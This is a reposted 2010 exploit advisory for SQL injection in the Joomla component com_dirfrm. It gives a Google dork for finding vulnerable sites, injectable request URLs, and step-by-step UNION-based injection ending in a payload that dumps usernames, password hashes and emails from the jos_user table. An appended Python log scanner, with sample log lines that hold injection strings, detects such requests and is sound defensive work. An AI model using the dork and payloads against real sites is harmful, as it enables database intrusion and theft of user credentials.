[Repost] Joomla Component "com_dirfrm" Sql Injection Vulnerability
Posted: 2010-8-19 04:01 1760

# Exploit Title : Joomla Component "com_dirfrm" Sql Injection Vulnerability  

# Date : 18 - 8 - 2010  

# Author : Hieuneo (Vietnam)  

# Version : All Versions  

# Tested on : Win 7 Home  

   

###############################################  

Dork google: inurl:"com_dirfrm"  

###############################################  

Exploit:  

http://site.com/path/index.php?option=com_dirfrm&task=listAll&catid=[SQL Injection]&id=8&Itemid=32  

or  

http://site.com/path/index.php?option=com_dirfrm&task=listAll&catid=1&id=[SQL Injection]&Itemid=32  

###############################################  

[SQL Injection]:  

-> Step1:  

- order by n--- False  

- order by n+1-- True  

   

-> Step2: null union select 1,2,3,4,...,n+1--  

Eg: http://site.com/path/index.php?option=com_dirfrm&task=listAll&catid=1&id=null union select 1,2,3,4,5,6,7,8,9,10--&Itemid=32  

   

-> Step3: replace display number on website  

version(), user(), database  

#if version SQL >=5 : try exploit with table system:  

___table_name from information_schema.tables where table_schema=database()--  

___column_name from information_schema.columns where table_name=Char(name table)  

#if version SQL <5: try exploit with blind SQL, blind table_name and column_name  

   

-> Step 4: collecting information  

   

null union select 1,2,3,concat_ws(0x7c,username,password,email) from jos_user--  

   

Done!
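
A defender-side check for the requests described in this post, as an added example that is not part of the original advisory: it scans web access logs for `com_dirfrm` requests whose `catid` or `id` is not a plain integer. The log lines and addresses are constructed samples, and the function names are hypothetical.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Parameters the advisory names as injectable; legitimate values are integers.
NUMERIC_PARAMS = ("catid", "id")
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def suspicious_params(url):
    """Return {param: decoded value} for com_dirfrm requests with non-integer catid/id."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    if "com_dirfrm" not in query.get("option", []):
        return {}
    return {name: value
            for name in NUMERIC_PARAMS
            for value in query.get(name, [])
            if not re.fullmatch(r"\d+", value)}

def scan(log_lines):
    """Return [(client_ip, findings)] for access-log lines that trip the check."""
    hits = []
    for line in log_lines:
        match = REQUEST_RE.search(line)
        findings = suspicious_params(match.group(1)) if match else {}
        if findings:
            hits.append((line.split()[0], findings))
    return hits

# Constructed sample lines (combined log format, documentation IP ranges).
SAMPLE_LOG = [
    '192.0.2.10 - - [19/Aug/2010:04:01:00 +0000] "GET /path/index.php?'
    'option=com_dirfrm&task=listAll&catid=1&id=8&Itemid=32 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [19/Aug/2010:04:02:11 +0000] "GET /path/index.php?'
    'option=com_dirfrm&task=listAll&catid=1&id=null+union+select+1,2,3--'
    '&Itemid=32 HTTP/1.1" 200 4980',
    '198.51.100.7 - - [19/Aug/2010:04:02:40 +0000] "GET /path/index.php?'
    'option=com_dirfrm&task=listAll&catid=1%20order%20by%2010--&id=8'
    '&Itemid=32 HTTP/1.1" 500 310',
    '192.0.2.44 - - [19/Aug/2010:04:03:05 +0000] "GET /path/index.php?'
    'option=com_content&view=article&id=12:about HTTP/1.1" 200 7200',
]

if __name__ == "__main__":
    for ip, findings in scan(SAMPLE_LOG):
        print(ip, findings)
```

The same integer-only rule is what the component should enforce server-side before either parameter reaches a query.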
